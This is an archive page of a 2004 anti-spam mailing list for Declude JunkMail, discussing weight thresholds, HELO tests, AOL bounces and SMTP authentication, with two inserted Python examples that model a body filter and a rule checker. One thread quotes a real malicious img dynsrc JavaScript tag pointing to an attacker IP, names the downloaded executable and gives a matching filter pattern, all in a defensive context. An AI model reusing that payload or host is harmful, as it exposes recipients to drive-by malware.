RE: [Declude.JunkMail] Weight and Action Question

2004-04-21 Thread Colbeck, Andrew
Yep, a configuration of WEIGHT10 DELETE and a WEIGHT20 HOLD would indeed
delete a message with a weight of 21.

Something you mentioned earlier prompts me to point out another thing; the
veterans in the list generally regard HOLD messages not as something they
have to check out several times a day to manually sort, but rather as a
convenient way to not bug the intended recipient while we are still able to
retrieve and deliver the mail for that recipient in case of a false
positive.

The net result is that we're more likely to err by holding a message than to
err by deleting it!

For reviewing messages, SpamReview is very popular; I stopped using it a
long time ago, though, due to the high volume I get (I delete very little).
Also, the \imail\spool\spam folder will of course grow in time, so you'll
want a handy utility that you can schedule to delete messages there that are
older than whatever time you choose.  See the Declude website, Tools page
for links to these and other tools.

Andrew 8)

-Original Message-
From: Goran Jovanovic [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, April 20, 2004 8:28 PM
To: [EMAIL PROTECTED]
Subject: RE: [Declude.JunkMail] Weight and Action Question


 
> Think of it this way -- if you used the HOLD action for E-mail with a
> weight of 5 or higher, and the DELETE action for E-mail with a weight of 10
> or higher, which action would you want taken on an E-mail with a weight of
> 25?

In your description I would want the DELETE taken. 

I was thinking of the whole thing in a different light. Specific test
gets action taken first then aggregate tests like WEIGHT20 get taken in
highest to lowest weight order. Then other things...

To paraphrase you JunkMail looks through all the actions of all the
tests that have been tripped starting with the most severe (strict)
DELETE and working down the list.

So if you did it wrong and setup WEIGHT10 DELETE and WEIGHT20 HOLD then
all e-mail with a weight of 10 or higher would be deleted and none would
be held. Right? OK you would have to be mostly asleep to set it up this
way...

Goran

---
[This E-mail was scanned for viruses by Declude Virus
(http://www.declude.com)]

---
This E-mail came from the Declude.JunkMail mailing list.  To
unsubscribe, just send an E-mail to [EMAIL PROTECTED], and
type unsubscribe Declude.JunkMail.  The archives can be found
at http://www.mail-archive.com.


RE: [Declude.JunkMail] OT: ASCII code

2004-04-21 Thread Colbeck, Andrew
Yep, also 0x20, also #20

Andrew 8)

-Original Message-
From: John Tolmachoff (Lists) [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, April 20, 2004 10:47 PM
To: [EMAIL PROTECTED]
Subject: [Declude.JunkMail] OT: ASCII code


A space is %20, correct?

John Tolmachoff
Engineer/Consultant/Owner
eServices For You





RE: [Declude.JunkMail] Dangerous img dynsrc tag in body

2004-04-21 Thread Colbeck, Andrew
Good tip!

This is what the web page is using:

http://netsecurity.about.com/cs/generalsecurity/a/aa021504.htm

to download a file it creates called C:\Program Files\Internet
Explorer\Iesearch.exe

by downloading and renaming the file http://68.192.132.122:8067/mstasks.dat
which my latest Trend Micro OfficeScan has never seen before.

Here's a copy of the original 'sploit:

http://www.securityfocus.com/archive/1/358913

and yes, there is a patch.  It is:

http://www.microsoft.com/technet/security/bulletin/MS04-013.mspx

which was part of the April Critical Patch update.

Oh, and the website is hosted at:

ool-44c0847a.dyn.optonline.net

so this is a zombie running a webserver on somebody's home machine.

Andrew 8)

-Original Message-
From: Adrian Hauri [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, April 20, 2004 9:34 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Declude.JunkMail] Dangerous img dynsrc tag in body


Just for your information:

We received a couple of Spam emails (fake ebay notifications) with the
following dangerous tag in the body:

img dynsrc=javascript:window.open('http://68.192.132.122_:8067/')
(I added the _ at the end so it doesn't harm anyone)

As soon as you open the email, the window will open the url.
The website hosts a dangerous ActiveX script that gets executed as soon as
you open the website.

The Antivirus(F-prot, AVG, McAfee) did not find a virus in the email and let
it through because it's just a html tag.

I added a body filter that searches for img
dynsrc=javascript:window.open( and trashes all emails based on that.


Adrian
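
The body filter described in this message, set beside a parsed check, as an added example that is not part of the original posts and not Declude's filter code. The sample bodies are constructed, the URL attribute list is an assumption, and a case-insensitive substring match is assumed for the literal filter.

```python
from html.parser import HTMLParser

# The substring from the post (the archive stripped the leading "<").
LITERAL = "img dynsrc=javascript:window.open("

# Assumption: attributes treated as URL-bearing for this check.
URL_ATTRS = {"dynsrc", "lowsrc", "src", "href", "background"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:")


def literal_filter(body):
    """Substring match as described in the post (case-insensitive assumed)."""
    return LITERAL in body.lower()


class ScriptUrlFinder(HTMLParser):
    """Collect (tag, attribute, scheme) for URL attributes that carry script."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names and decodes
        # character references in attribute values before calling us.
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            # Drop spaces and control characters, then compare lower-cased.
            norm = "".join(ch for ch in value if ch > " ").lower()
            if norm.startswith(SCRIPT_SCHEMES):
                self.hits.append((tag, name, norm.split(":", 1)[0]))


def find_script_urls(body):
    """Return every script-scheme URL attribute found in an HTML body."""
    finder = ScriptUrlFinder()
    finder.feed(body)
    finder.close()
    return finder.hits


def scan_body(body):
    """Run both checks so their coverage can be compared."""
    return {"literal": literal_filter(body), "parsed": find_script_urls(body)}


# Constructed sample bodies (example.invalid never resolves).
SAMPLE_AS_POSTED = "<img dynsrc=javascript:window.open('http://example.invalid/')>"
SAMPLE_QUOTED = "<IMG  DYNSRC=\"JavaScript:window.open('http://example.invalid/')\">"
SAMPLE_BENIGN = '<img src="http://example.invalid/logo.gif" alt="about dynsrc=javascript:">'

if __name__ == "__main__":
    for body in (SAMPLE_AS_POSTED, SAMPLE_QUOTED, SAMPLE_BENIGN):
        print(scan_body(body))
```

The quoted, mixed-case sample is only caught by the parsed check, which is the gap a literal body filter leaves.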



Re: [Declude.JunkMail] US Treasury cannot do it right?

2004-04-21 Thread R. Scott Perry

> OK if I am right the US Treasury Department needs help!

Very much so:

> They identified themselves as 10.0.7.238 instead of a host.domain !!??
> This is very bad.

There are actually 3 problems with this:

[1] They did not identify themselves using a host name, which is the 
standard method.
[2] They technically *did* identify themselves as a host name (10.0.7.238 
in that context is a host name, not an IP).  The host name 10.0.7.238 
doesn't exist.  If you use an IP rather than a hostname, you need to have 
it in brackets.
[3] The IP they tried but failed to identify themselves as is a private IP, 
and therefore would be invalid anyway.

   -Scott
---
Declude JunkMail: The advanced anti-spam solution for IMail mailservers 
since 2000.
Declude Virus: Ultra reliable virus detection and the leader in mailserver 
vulnerability detection.
Find out what you've been missing: Ask for a free 30-day evaluation.



RE: [Declude.JunkMail] Weight and Action Question

2004-04-21 Thread R. Scott Perry

> To paraphrase you JunkMail looks through all the actions of all the
> tests that have been tripped starting with the most severe (strict)
> DELETE and working down the list.

That's another way of looking at it.  In this case, if there is a conflict 
with an action that has already been taken, the one that has already been 
taken will have priority.

> So if you did it wrong and setup WEIGHT10 DELETE and WEIGHT20 HOLD then
> all e-mail with a weight of 10 or higher would be deleted and none would
> be held. Right? OK you would have to be mostly asleep to set it up this
> way...

Correct.

   -Scott
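
A small model of the precedence rule confirmed in this thread, as an added example that is not Declude's code and not part of the original posts. It assumes only the two actions discussed (DELETE before HOLD) and rule lines of the form `WEIGHT<n> <ACTION>`; the function names are hypothetical.

```python
import re

# Assumption: only the two actions discussed in the thread, most severe first.
SEVERITY = ("DELETE", "HOLD")

RULE_RE = re.compile(r"^\s*WEIGHT(\d+)\s+([A-Z]+)\s*$")


def parse_rules(text):
    """Parse lines such as 'WEIGHT10 DELETE' into (name, threshold, action)."""
    rules = []
    for line in text.splitlines():
        if not line.strip():
            continue
        match = RULE_RE.match(line)
        if not match:
            raise ValueError(f"unrecognised rule line: {line!r}")
        threshold, action = int(match.group(1)), match.group(2)
        if action not in SEVERITY:
            raise ValueError(f"action not modelled here: {action}")
        rules.append((f"WEIGHT{threshold}", threshold, action))
    return rules


def resolve(weight, rules):
    """Return (action, rule) applied to a message of this weight.

    Every rule whose threshold is met has tripped; the most severe action
    among the tripped rules is taken and any less severe one is skipped.
    """
    tripped = [rule for rule in rules if weight >= rule[1]]
    for action in SEVERITY:
        candidates = [rule for rule in tripped if rule[2] == action]
        if candidates:
            # Report the highest threshold that tripped for this action.
            return action, max(candidates, key=lambda rule: rule[1])[0]
    return None, None


def shadowed(rules):
    """List (rule, shadowing_rule) pairs where the rule can never decide.

    A rule is shadowed when a more severe action trips at the same or a
    lower weight, so the milder action is never the one taken.
    """
    pairs = []
    for name, threshold, action in rules:
        rank = SEVERITY.index(action)
        for other_name, other_threshold, other_action in rules:
            if SEVERITY.index(other_action) < rank and other_threshold <= threshold:
                pairs.append((name, other_name))
                break
    return pairs


# The two configurations discussed in the thread.
MISORDERED = parse_rules("WEIGHT10 DELETE\nWEIGHT20 HOLD")
INTENDED = parse_rules("WEIGHT5 HOLD\nWEIGHT10 DELETE")

if __name__ == "__main__":
    print(resolve(21, MISORDERED), shadowed(MISORDERED))
    print(resolve(25, INTENDED), resolve(7, INTENDED), shadowed(INTENDED))
```

Running `shadowed()` over a rule set before deploying it flags a HOLD threshold that sits above a DELETE threshold, which is the misconfiguration asked about here.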


Re: [Declude.JunkMail] Scott's tests

2004-04-21 Thread R. Scott Perry

> The header of my message to the list is showing
>
> X-Weight: -17 (FIVETENIGNORE, SPFPASS, CURRENT, HEUR3, SPAMCHK)
> X-Declude-Sender: [EMAIL PROTECTED] [208.154.200.6]
> Scott, would you please comment on the last 4 : SPFPASS, CURRENT, HEUR3,
> SPAMCHK
> I suppose that i am now  passing SPF?  but why did i fail last 3 ?

You are correct about SPFPASS (it's a good thing).  CURRENT and HEUR3 can 
be ignored (they are internal tests we use here).  SPAMCHK can also be 
ignored (since we have it at the strictest settings).  So the only one that 
might be worth concern is FIVETENIGNORE -- but we're also listed in one of 
the FIVETEN* tests, so it isn't something to be too concerned about (they 
list entire ISPs in FIVETENIGNORE).

   -Scott


[Declude.JunkMail] More AOL problems

2004-04-21 Thread Serge
Hi all
any help appreciated
Is this specific for this sender ? or a problem with my server/DNS configs ?
I do not see AOL acknowledging my IP address anywhere .
TIA

Here is my log

20040414 082409 127.0.0.1   SMTP (0884048F) processing
F:\Imail\spool\Qf19c0a01026e5656.SMD
20040414 082411 127.0.0.1   SMTP (0884048F) Trying aol.com (0)
20040414 082411 127.0.0.1   SMTP (0884048F) Connect aol.com
[64.12.138.57:25] (1)
20040414 082414 127.0.0.1   SMTP (0884048F) 220-rly-xk06.mx.aol.com
ESMTP mail_relay_in-xk6.10; Wed, 14 Apr 2004 04:24:14 -0500
20040414 082414 127.0.0.1   SMTP (0884048F) 220-America Online (AOL) and
its affiliated companies do not
20040414 082414 127.0.0.1   SMTP (0884048F) 220- authorize the use
of its proprietary computers and computer
20040414 082414 127.0.0.1   SMTP (0884048F) 220- networks to accept,
transmit, or distribute unsolicited bulk
20040414 082414 127.0.0.1   SMTP (0884048F) 220- e-mail sent from
the internet.  Effective immediately:  AOL
20040414 082414 127.0.0.1   SMTP (0884048F) 220- may no longer
accept connections from IP addresses which
20040414 082414 127.0.0.1   SMTP (0884048F) 220  have no reverse-DNS
(PTR record) assigned.
20040414 082414 127.0.0.1   SMTP (0884048F) EHLO mail.cefib.com
20040414 082415 127.0.0.1   SMTP (0884048F) 250-rly-xk06.mx.aol.com
mail.cefib.com
20040414 082415 127.0.0.1   SMTP (0884048F) 250 HELP
20040414 082415 127.0.0.1   SMTP (0884048F) MAIL
FROM:[EMAIL PROTECTED]
20040414 082424 127.0.0.1   SMTP (0884048F) 250 OK
20040414 082424 127.0.0.1   SMTP (0884048F) rdeliver aol.com
[EMAIL PROTECTED] (1) [EMAIL PROTECTED] 2610
20040414 082424 127.0.0.1   SMTP (0884048F) QUIT
20040414 082424 127.0.0.1   SMTP (0884048F) 221 SERVICE CLOSING CHANNEL
20040414 082424 127.0.0.1   SMTP (0884048F) finished
F:\Imail\spool\Qf19c0a01026e5656.SMD  status=1

And here is aol reply :

Reporting-MTA: dns; rly-xk06.mx.aol.com
Arrival-Date: Wed, 14 Apr 2004 04:24:24 -0400 (EDT)
Final-Recipient: RFC822; [EMAIL PROTECTED]
Action: failed
Status: 5.1.1
Remote-MTA: DNS; air-xk01.mail.aol.com
Diagnostic-Code: SMTP; 550 lamintd IS NOT ACCEPTING MAIL FROM THIS SENDER
Last-Attempt-Date: Wed, 14 Apr 2004 04:24:39 -0400 (EDT)





Re: [Declude.JunkMail] Scott's tests

2004-04-21 Thread Serge
these would be scott's logs, since these tests were done on his server


- Original Message - 
From: Markus Gufler [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Wednesday, April 21, 2004 5:51 AM
Subject: RE: [Declude.JunkMail] Scott's tests



  Scott, would you please comment on the last 4 : SPFPASS,
  CURRENT, HEUR3, SPAMCHK I suppose that i am now  passing SPF?
   but why did i fail last 3 ?

 For SPAMCHK please provide the spamchk log's for this message.

 Markus




Re: [Declude.JunkMail] More AOL problems

2004-04-21 Thread R. Scott Perry

> any help appreciated
> Is this specific for this sender ? or a problem with my server/DNS configs ?
> I do not see AOL acknowledging my IP address anywhere .

This:

> 20040414 082414 127.0.0.1   SMTP (0884048F) 220-rly-xk06.mx.aol.com
> ESMTP mail_relay_in-xk6.10; Wed, 14 Apr 2004 04:24:14 -0500
> 20040414 082414 127.0.0.1   SMTP (0884048F) 220-America Online (AOL) and
> its affiliated companies do not
> 20040414 082414 127.0.0.1   SMTP (0884048F) 220- authorize the use
> of its proprietary computers and computer
> 20040414 082414 127.0.0.1   SMTP (0884048F) 220- networks to accept,
> transmit, or distribute unsolicited bulk
> 20040414 082414 127.0.0.1   SMTP (0884048F) 220- e-mail sent from
> the internet.  Effective immediately:  AOL
> 20040414 082414 127.0.0.1   SMTP (0884048F) 220- may no longer
> accept connections from IP addresses which
> 20040414 082414 127.0.0.1   SMTP (0884048F) 220  have no reverse-DNS
> (PTR record) assigned.

Is the standard AOL boilerplate SMTP greeting that they send to everyone.

> 20040414 082415 127.0.0.1   SMTP (0884048F) MAIL
> FROM:[EMAIL PROTECTED]
> 20040414 082424 127.0.0.1   SMTP (0884048F) 250 OK
> 20040414 082424 127.0.0.1   SMTP (0884048F) rdeliver aol.com
> [EMAIL PROTECTED] (1) [EMAIL PROTECTED] 2610

I believe something is missing here (RCPT TO and DATA lines), but the 
rdeliver line indicates that the E-mail was successfully sent.

> And here is aol reply :
>
> Reporting-MTA: dns; rly-xk06.mx.aol.com
> Arrival-Date: Wed, 14 Apr 2004 04:24:24 -0400 (EDT)
> Final-Recipient: RFC822; [EMAIL PROTECTED]
> Action: failed
> Status: 5.1.1
> Remote-MTA: DNS; air-xk01.mail.aol.com
> Diagnostic-Code: SMTP; 550 lamintd IS NOT ACCEPTING MAIL FROM THIS SENDER
> Last-Attempt-Date: Wed, 14 Apr 2004 04:24:39 -0400 (EDT)

That means that after AOL received the E-mail, they bounced 
it.  Presumably, the AOL user does not want mail from [EMAIL PROTECTED] 
(perhaps they reported it as spam).  That may not be the case, however 
(bounce message reasons are often vague, confusing, or completely wrong).

   -Scott


Re: [Declude.JunkMail] New test

2004-04-21 Thread System Administrator
on 4/20/04 3:16 PM, Matt wrote:

 NOTCONTAINS would be incredibly helpful for lots of filters, though of course
 all forms of NOT filters would be good addition, but NOTCONTAINS is the most
 flexible and therefore capable, especially to defeat a counterbalancing filter
 so that it doesn't credit too much.

I agree 100%! 

 I'm sure you probably have a reason for this, but you might consider
 whitelisting your own address space and using Hijack for spam prevention.  If
 you were on IMail 8, WHITELIST AUTH and PREWHITELIST ON wouldn't be bad ideas
 either if you required AUTH.

We're an ISP and we believe we can't whitelist our addresses and we
definitely can't require authentication.

 I believe that Entourage on a Mac will fail CMDSPACE,

No, you misread one of my original messages when CMDSPACE was released
and have continued to state that Entourage on a Mac will fail CMDSPACE when
that is not true.
 
 least sometimes fail this new HELOIP test,

Yes, Microsoft's Entourage (Mac) and Apple's Mail both fail the new HELOISIP
test. 

If I get some time I may install some other Mac OS X e-mail clients to see
if they fail the same test. That might let me know if the problem is an
e-mail client problem or a Unix (BSD under the Mac interface) problem.

By the way, have you fixed the problem with your external size program?

Later,
Greg



RE: [Declude.JunkMail] US Treasury cannot do it right?

2004-04-21 Thread Jeff Maze - Hostmaster
Yeah, I got sick of modifying my setups for others' mistakes..  I've just
ended up forwarding them the message with the internet headers telling them
what the problem is, how to fix it, and that messages from them will be
blocked/reviewed until the problems are fixed..  Haven't gotten any
responses though..  Goes with the normal IT mentality..  It's not our
problem, it's yours..  Your setup is wrong..  Ours is perfect..  UGH!  I
hate hearing that..  Right there I know they don't even want to look at
their logs, etc to try and resolve the problem..

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Kevin Bilbee
Sent: Tuesday, April 20, 2004 11:30 PM
To: [EMAIL PROTECTED]
Subject: RE: [Declude.JunkMail] US Treasury cannot do it right?

My personal opinion is that ISPs, government agencies, Technology
companies should be held to a higher standard than the average business. If
they are not following standards then they should be held for review. They
can be compromised by zombies just like everyone else.

After reviewing the held messages then notify the admin of the problem. 

I think part of the problem with false positives are the people finding the
misconfigurations are modifying their rule sets to accommodate the failure of
other mail admins to configure their systems correctly. When they should be
notifying them of their problems so they can fix them.


Kevin Bilbee

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Goran 
 Jovanovic
 Sent: Tuesday, April 20, 2004 8:11 PM
 To: [EMAIL PROTECTED]
 Subject: [Declude.JunkMail] US Treasury cannot do it right?
 
 
 OK if I am right the US Treasury Department needs help!
 
 They identified themselves as 10.0.7.238 instead of a host.domain !!?? 
 This is very bad.
 
 There is a REVDNS for the sending IP
 66.77.65.238 PTR record: lists.qai.irs.gov
 
 What am I asking here? Perhaps it is just amazement that the e-mail 
 got out like this. I suppose there is nothing that we can do from this 
 end except build enough room in our tests to prevent legit stuff from 
 getting caught.
 
 The more I look into this SPAM stuff the scarier it gets.
 
 -
 
 Received: from 10.0.7.238 [66.77.65.238] by tlsonline.com
   (SMTPD32-8.10 ) id A63E11DB00DA; Tue, 20 Apr 2004 12:56:30 -0400
 Date: Tue, 20 Apr 2004 12:55:42 -0400 (EDT)
 Message-Id: 
 [EMAIL PROTECTED]
 ts.treas.g
 ov
 From: US Treasury Release: News [EMAIL PROTECTED]
 To: US Treasury Release: News [EMAIL PROTECTED]
 Subject: [US Treasury] Treasury and IRS Address Foreign Tax Credit, 
 Partnership Transactions
 List-Unsubscribe: mailto:[EMAIL PROTECTED]
 List-Subscribe: mailto:[EMAIL PROTECTED]
 Reply-To: US Treasury Release: News [EMAIL PROTECTED]
 X-Message-Id: [EMAIL PROTECTED]
 Sender: [EMAIL PROTECTED]
 X-RBL-Warning: NOABUSE: Not supporting [EMAIL PROTECTED]
 X-RBL-Warning: HELOBOGUS: Domain 10.0.7.238 has no MX or A records 
 [0301].
 X-RBL-Warning: IPNOTINMX: 
 X-RBL-Warning: NOLEGITCONTENT: No content unique to legitimate E-mail 
 detected.
 X-Declude-Sender: [EMAIL PROTECTED]
 [66.77.65.238]
 X-Declude-Spoolname: D563e11db00dae005.SMD
 X-Note: This E-mail was sent from lists.qai.irs.gov ([66.77.65.238]).
 X-Spam-Tests-Failed: NOABUSE, HELOBOGUS, IPNOTINMX, NOLEGITCONTENT, 
 HELOISIP, HELOISIPX [7]
 X-Note: This E-mail was scanned by Declude JunkMail
 (www.declude.com) for spam.
 X-Note: Total spam weight of this E-mail is 7.
 X-Country-Chain: 
 Organization: The LAN Shoppe
 
 
  
  Goran Jovanovic
  The LAN Shoppe
 


[Declude.JunkMail] This got through.. -Question-

2004-04-21 Thread Jeff Maze - Hostmaster
Just a question..  The message below (internet headers listed only) got
through and only failed on the CMDSPACE test..  But one of the X-Notes
states that there was a timeout looking up the IP address (it's
24-51-32-177.kntnny.adelphia.net)..

Anyway, I was wondering if a test could be added that would add a
low weight (say 2 or 3) for timeouts during DNS lookups?  Only bad thing, if
your DNS server fails, so will a majority of your messages..  Any thoughts?

__
Received: from emailaddresses.com [24.51.32.177] by mail.crescentdigital.com
  (SMTPD32-6.06) id ABBD117012A; Wed, 21 Apr 2004 01:50:53 -0400
Message-ID: [EMAIL PROTECTED]
From: Cheapest Only Shop [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Your Doctor say no? We will say yes! 82928
Date: Wed, 21 Apr 2004 00:50:40 -0500
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary==_NextPart_600_2990_759E2990.759E2990
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
X-RBL-Warning: CMDSPACE: Space found in RCPT TO: command .
X-Declude-Sender: [EMAIL PROTECTED] [24.51.32.177]
X-Note: This E-mail was scanned by Declude JunkMail (www.declude.com) for
spam.
X-Spam-Tests-Failed: CMDSPACE [8]
X-Note: This E-mail was sent from (timeout) ([24.51.32.177]).
X-RCPT-TO: [EMAIL PROTECTED]
X-UIDL: 382030971
Status: U




Re: [Declude.JunkMail] OT: ASCII code

2004-04-21 Thread DLAnalyzer Support
Correct... 

Darrell 

John Tolmachoff (Lists) writes: 

A space is %20, correct? 

John Tolmachoff
Engineer/Consultant/Owner
eServices For You 

 




Check Out DLAnalyzer a comprehensive reporting tool for
Declude Junkmail Logs - http://www.invariantsystems.com 



Re: [Declude.JunkMail] HELOBOGUS, HELOISIP and HELOISIPX questions

2004-04-21 Thread Bud Durland
Goran Jovanovic wrote:

> This is parts of a header I received and I just want to check a few
> things
> So the spammer thought that he would use my IP address in the HELO line
> 205.150.108.8 to identify his domain, even though his real IP address is
> 220.185.227.109?
> Obviously an IP address is not a valid domain so it fails the HELOBOGUS
> test?
> It failed the HELOISIP test because the domain was an IP address?

Yes.  It would be more correct to say that HELOISIP failed because the 
domain _contained_ an IP address.  205.150.108.8.this.is.a.host.name 
would also have failed HELOISIP.

> It failed the HELOISIPX test ... not sure why since there is no reverse
> DNS to parse?

It failed HELOISIPX because the host name is a pure IP address.  
205.150.108.8.this.is.a.host.name will *not* fail HELOISIPX.

In the next release, both tests will not fail host names in bracketed IP 
format [205.150.108.8]

--
---
illigitimi non carborundum
---
Bud Durland, CNE Mold-Rite Plastics
Network Administrator http://www.mrpcap.com
---
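
The HELO checks explained in this message, together with the three problems listed for the Treasury HELO in the "US Treasury cannot do it right?" reply above, as an added example that is not Declude's implementation. It assumes "contains an IP address" means a dotted quad anywhere in the name; the labels `PRIVATE_IP`, `ADDRESS_LITERAL` and `BAD_LITERAL` are hypothetical, and the two `Received:` lines are copied from the headers quoted in this archive.

```python
import ipaddress
import re

# IMail-style trace line as quoted in this archive:
#   Received: from <HELO name> [<connecting IP>] by <receiving host>
RECEIVED_RE = re.compile(
    r"^Received: from (\S+) \[(\d{1,3}(?:\.\d{1,3}){3})\] by (\S+)"
)
# Candidate dotted quad inside a longer name (assumed meaning of "contains").
QUAD_RE = re.compile(r"(?<![\d.])\d{1,3}(?:\.\d{1,3}){3}(?!\d)")


def _ipv4(text):
    """Return an IPv4Address, or None when the text is not a valid address."""
    try:
        return ipaddress.IPv4Address(text)
    except ValueError:
        return None


def classify_helo(helo):
    """Return the set of findings for one HELO/EHLO argument."""
    name = helo.strip()
    findings = set()

    # Bracketed address literal: the form an IP is supposed to take in HELO,
    # and the form the thread says the next release will stop failing.
    if name.startswith("[") and name.endswith("]"):
        ip = _ipv4(name[1:-1])
        if ip is None:
            return {"BAD_LITERAL"}
        findings.add("ADDRESS_LITERAL")
        if ip.is_private:
            findings.add("PRIVATE_IP")
        return findings

    # Bare IP: read as a host name, and it is nothing but an IP address.
    ip = _ipv4(name)
    if ip is not None:
        findings.update({"HELOISIP", "HELOISIPX"})
        # is_private covers RFC 1918 and other not globally reachable ranges.
        if ip.is_private:
            findings.add("PRIVATE_IP")
        return findings

    # Host name that merely contains an IP address: HELOISIP only.
    if any(_ipv4(m.group(0)) for m in QUAD_RE.finditer(name)):
        findings.add("HELOISIP")
    return findings


def audit_received(line):
    """Return (helo, connecting_ip, findings), or None if the line differs."""
    match = RECEIVED_RE.match(line)
    if not match:
        return None
    helo, peer = match.group(1), match.group(2)
    return helo, peer, classify_helo(helo)


SAMPLE_LINES = [
    "Received: from 10.0.7.238 [66.77.65.238] by tlsonline.com",
    "Received: from emailaddresses.com [24.51.32.177] by mail.crescentdigital.com",
]

if __name__ == "__main__":
    for sample in SAMPLE_LINES:
        print(audit_received(sample))
    for helo in ("205.150.108.8.this.is.a.host.name", "[205.150.108.8]"):
        print(helo, sorted(classify_helo(helo)))
```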


[Declude.JunkMail] Where did the RHSBL list go?

2004-04-21 Thread Dan Geiser



Hello, All,
Could someone tell me where I might find the list of RHSBL tests which
used to be listed at the bottom of this page the old List of all Known
DNS-Based Spam Databases? The new document is here,
http://www.declude.com/Articles.asp?ID=97,
but the RHSBL information seems to have been removed.

Thanks In Advance,
Dan Geiser
[EMAIL PROTECTED]




Re: [Declude.JunkMail] Where did the RHSBL list go?

2004-04-21 Thread R. Scott Perry

> Could someone tell me where I might find the list of RHSBL tests which
> used to be listed at the bottom of this page the old List of all Known
> DNS-Based Spam Databases?  The new document is here,
> http://www.declude.com/Articles.asp?ID=97,
> but the RHSBL information seems to have been removed.

Thanks for pointing that out -- it looks like they were accidentally 
removed.  I'll contact the person handling the new web site and let him 
know about this.

   -Scott


RE: [Declude.JunkMail] US Treasury cannot do it right?

2004-04-21 Thread John Tolmachoff \(Lists\)
Well, I will mention his first name, blast shields up first. (He has a way
of irritating people.)

Len Conrad, most often seen on the Imail list. 

John Tolmachoff
Engineer/Consultant/Owner
eServices For You


 -Original Message-
 From: [EMAIL PROTECTED] [mailto:Declude.JunkMail-
 [EMAIL PROTECTED] On Behalf Of Goran Jovanovic
 Sent: Wednesday, April 21, 2004 6:01 AM
 To: [EMAIL PROTECTED]
 Subject: RE: [Declude.JunkMail] US Treasury cannot do it right?
 
 John,
 
  Took getting Len
  involved to set him straight.
 
 Who is Len?
 
 
  Goran Jovanovic
 


RE: [Declude.JunkMail] New test

2004-04-21 Thread Hirthe, Alexander
Hello Sysadmin,

it would be nice, if you could use a real name.

 We're an ISP and we believe we can't whitelist our addresses and we
 definitely can't require authentication.
Why not? 
We do the same job, and I thought the same. 
But if all would think so, we will never get rid of the spammers. 
So (about 1,5 years ago) I decided to _require_ Auth, and we informed our
customers about it.
Some of them asked, most not.

Tell them, they will get 10% less Spam, if you will require Auth, and they
will love it :))

Alex 


RE: [Declude.JunkMail] New test

2004-04-21 Thread Markus Gufler

 We're an ISP and we believe we can't whitelist our addresses and we 
 definitely can't require authentication.


If you haven't your own network (ISP backbone) or users connecting from a
defined range of IP's you SHOULD switch to SMTP-AUTH and you CAN prepare
some useful how-to pages, then inform your customers and give them some
weeks to adapt the settings.

With a little bit log-parsing you can also identify users that haven't
yet enabled SMTP-AUTH and send them an additional alert.

Markus





Re: [Declude.JunkMail] New test

2004-04-21 Thread System Administrator
on 4/21/04 11:17 AM, John Tolmachoff (Lists) wrote:

 Why are you so much different than other ISPs that you can not force
 authentication?

Try to imagine having to contact thousands of subscribers and walk them
through changing their settings. Even if we only took a minute to help each
subscriber (and I can guarantee you a minute isn't even close to the time it
would take to help our subscribers) we're looking at 5+ 24 hour days doing
nothing but that. 


 If you really think about it, if you are not forcing
 authentication, you are ripe to allowing spamming and run-away viruses.

Why? Could you please explain that logic to me as I don't understand it.

We don't seem to be listed on any spam databases, see
http://www.dnsstuff.com/tools/ip4r.ch?ip=12.4.184.4 .

Later,
Greg



[Declude.JunkMail] Processing load on machine

2004-04-21 Thread Paul Fuhrmeister
If the following is in the Global.cfg file, is it true that 
dnsbl.sorbs.net will be queried once and the result will be 
evaluated 8 times?

SORBS-HTTP   ip4r  dnsbl.sorbs.net  127.0.0.2   5  0
SORBS-SOCKS  ip4r  dnsbl.sorbs.net  127.0.0.3   5  0
SORBS-MISC   ip4r  dnsbl.sorbs.net  127.0.0.4   5  0
SORBS-SMTP   ip4r  dnsbl.sorbs.net  127.0.0.5   5  0
SORBS-SPAM   ip4r  dnsbl.sorbs.net  127.0.0.6   7  0
SORBS-WEB    ip4r  dnsbl.sorbs.net  127.0.0.7   5  0
SORBS-BLOCK  ip4r  dnsbl.sorbs.net  127.0.0.8   5  0
SORBS-DUHL   ip4r  dnsbl.sorbs.net  127.0.0.10  6  0

[EMAIL PROTECTED]



RE: [Declude.JunkMail] New test

2004-04-21 Thread John Tolmachoff \(Lists\)
  Why are you so much different than other ISPs that you can not force
  authentication?
 
 Try to imagine having to contact thousands of subscribers and walk them
 through changing their settings. Even if we only took a minute to help each
 subscriber (and I can guarantee you a minute isn't even close to the time it
 would take to help our subscribers) we're looking at 5+ 24 hour days doing
 nothing but that.

I, as well as every one else, understands that. What you need to do is
formulate a plan to implement over say a month. Start with broadcast
announcements and such. Then, start migrating your users in blocks. Yes, it
would be a lot of work. But the results are worth it.

  If you really think about it, if you are not forcing
  authentication, you are ripe to allowing spamming and run-away viruses.
 
 Why? Could you please explain that logic to me as I don't understand it.

I assume you are relaying for addresses in Imail SMTP. (If you are relaying
for users or domains, you have no idea about relay settings.) That means
that any one using one of those addresses can send out millions of spam
e-mails through your server and there is nothing you can do about it. This
includes users that may have viruses on their computers, and are now acting
as robots.

John Tolmachoff
Engineer/Consultant/Owner
eServices For You




Re: [Declude.JunkMail] New test

2004-04-21 Thread Matt




John,

Dial-up ISP's, especially smaller ones, are very unlikely to be
targeted by spammers due to the dynamic nature of the IP space. There
one minute, gone the next...and the bandwidth sucks. Almost all
viruses don't use mail servers to spread, so SMTP AUTH won't stop them
either, but blocking port 25 would along with a host of other
techniques which are less restrictive on legitimate use such as
monitoring/automatic shutoff of accounts.

I looked up Greg's IP space in SenderBase and there are absolutely no
signs of dial-up IP's leaking spam or viruses, and only his MX servers
